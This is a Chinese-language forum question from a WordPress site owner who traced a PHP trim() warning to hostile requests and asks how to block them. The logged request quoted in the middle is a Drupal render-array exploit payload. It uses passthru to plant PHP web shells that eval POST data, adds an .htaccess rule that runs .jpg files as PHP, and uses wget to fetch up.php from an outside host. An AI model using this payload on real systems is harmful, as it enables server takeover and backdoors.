我的日志开始充满此警告...
<select class="form-control show-tick" name="brand" id="brand" required>
<option value="">Please select</option>
</select></td>
哪一行?
Warning: trim() expects parameter 1 to be string, array given in /wp-includes/class-wp-query.php line 756
所以要看看发生了什么,我添加了...
public function parse_query( $query = '' ) {
...
$qv['name'] = trim( $qv['name'] );
我回来查看日志并看到正在通过这里的阵列...
// Debug an attack
if( !is_string($qv['name']) ) {
error_log( '$_SERVER[HTTP_REFERER] = ' . $_SERVER['HTTP_REFERER'] );
error_log(print_r(debug_backtrace(), true));
exit();
}
$qv['name'] = trim( $qv['name'] );
您可能已经注意到,我记录了该请求,结果是...
[query_vars] => Array
(
[name] => Array
(
[#post_render] => Array
(
[0] => passthru
)
[#type] => markup
[#markup] => echo \'Vuln!! patch it Now!\' > vuln.htm; echo \'Vuln!!<?php @eval($_POST[\'pass\']) ?>\'> sites/default/files/vuln.php; echo \'Vuln!!<?php @eval($_POST[\'pass\']) ?>\'> vuln.php; cd sites/default/files/; echo \'AddType application/x-httpd-php .jpg\' > .htaccess; wget \'http://40k.waszmann.de/Deutsch/images/up.php\'
)
看起来像是被欺骗的。
完整的调用堆栈转储可以在这里找到:https://paste.ee/p/0Vd49
如何防止这种垃圾通过,我使用任何过滤器进行了一些检查以阻止这些呼叫吗?
谢谢!